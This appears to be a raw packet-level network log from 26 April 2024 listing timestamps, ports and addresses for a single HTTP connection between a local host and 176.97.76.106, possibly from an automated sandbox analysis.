Apr 26, 2024 17:11:09.276035070 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.276067972 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.276109934 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.276159048 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.276165962 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.276185036 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.276206017 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.276238918 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.276247978 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.276256084 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.276279926 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.276297092 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.276314974 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.276348114 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.276357889 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.276365042 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.276382923 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.276386976 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.276432991 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.277872086 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.277894974 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.277936935 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.277955055 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.277991056 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.277992010 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.278009892 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.278321028 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.278341055 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.278366089 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.278371096 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.278384924 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.278400898 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.278408051 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.278557062 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.278575897 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.278604984 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.278623104 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.278640985 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.278645992 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.278676033 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.278704882 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.278728962 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.278747082 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.278764009 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.278781891 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.278789997 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.278800964 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.278817892 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.278824091 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.278835058 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.278845072 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.278852940 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.278886080 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.278896093 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.278932095 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.279371977 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.279391050 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.279408932 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.279442072 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.279453039 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.279474020 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.279499054 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.279506922 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.279524088 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.279577017 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.279580116 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.279623032 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.279917955 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.279963017 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.279980898 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.280030966 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.280050039 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.280078888 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.280096054 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.280153036 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.280170918 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.280189991 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.280208111 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.280220032 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.280225992 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.280241966 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.280260086 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.280270100 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.280278921 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.280320883 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.280325890 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.280344963 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.280617952 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.280653000 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.280678988 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.280702114 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.281801939 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.281845093 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.281862974 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.281912088 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.281913042 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.281933069 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.281965971 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.281970024 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.281989098 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.282006025 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.282031059 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.282054901 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.282058954 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.282080889 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.282098055 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.282140017 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.282144070 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.282161951 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.282180071 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.282185078 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.282197952 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.282227993 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.282259941 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.282284021 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.282377005 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.282396078 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.282457113 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.282475948 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.282495975 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.282505989 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.282527924 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.282546043 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.282562971 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.282583952 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.282591105 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.282599926 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.282617092 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.282641888 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.282650948 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.282666922 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.282666922 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.282726049 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.282743931 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.282762051 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.282772064 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.282778978 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.282788992 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.282820940 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.282960892 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.283037901 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.283056974 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.283072948 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.283090115 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.283133030 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.283133030 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.283133030 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.283149958 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.283166885 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.283174038 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.283212900 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:09.283221960 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:09.477579117 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.353394032 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.477602959 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.641812086 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.906295061 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.906356096 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.906394005 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.906429052 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.906445980 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.906467915 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.906503916 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.906539917 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.906543970 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.906543970 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.906577110 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.906627893 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.906632900 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.906671047 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.906732082 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.907381058 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.907419920 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.907466888 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.907519102 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.907557964 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.907593966 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.907603979 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.907630920 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.907665968 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.907675982 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.907701969 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.907737970 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.907742023 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.907773972 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.907810926 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.907829046 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.907846928 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.907882929 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.907892942 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.907918930 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.907964945 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.907973051 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.908010006 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.908056974 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.908065081 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.908119917 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.908154964 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.908158064 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.908193111 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.908229113 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.908236027 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.908263922 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.908298969 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.908308029 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.908334970 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.908370018 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.908379078 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.908404112 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.908438921 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.908463001 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.908476114 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.908510923 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.908519983 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.908546925 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.908582926 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.908591986 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.908617973 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.908653975 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.908663988 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.908689976 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.908725023 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.908741951 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.908760071 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.908796072 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.908807993 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.908833981 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.908870935 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.908876896 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.908906937 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.908941984 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.908951998 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.908978939 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.909014940 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.909018993 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.909051895 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.909089088 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.909101009 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.909125090 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.909171104 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.909410954 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.909446955 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.909533024 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.909554005 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.909569025 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.909605026 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.909609079 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.909641027 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.909677029 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.909683943 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.909713030 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.909750938 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.909758091 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.909786940 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.909821987 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.909846067 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.909859896 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.909895897 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.909904003 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.909933090 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.909970045 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.909976959 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.910006046 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.910043001 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.910052061 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.910079956 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.910115957 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.910126925 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.910154104 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.910191059 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.910198927 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.910227060 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.910263062 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.910269022 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.910300016 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.910336018 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.910342932 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.910372019 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.910408974 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.910417080 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.910445929 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.910480976 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.910485983 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.910516977 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.910553932 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.910561085 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.910589933 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.910625935 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.910634041 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.910662889 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.910697937 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.910703897 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.910733938 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.910769939 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.910789967 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.910806894 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.910841942 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.910850048 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.910877943 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.910912991 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.910934925 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.910949945 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.910993099 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.911003113 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.911031008 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.911066055 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.911087990 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.911102057 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.911138058 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.911147118 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.911174059 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.911210060 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.911216021 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.911246061 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.911281109 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.911298037 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.911317110 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.911354065 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.911356926 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.911389112 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.911425114 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.911432981 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.911461115 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.911495924 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.911504984 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.911536932 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.911572933 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.911580086 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.911611080 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.911647081 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.911653996 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:10.911681890 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:10.911717892 CEST	80	49713	176.97.76.106	192.168.2.5
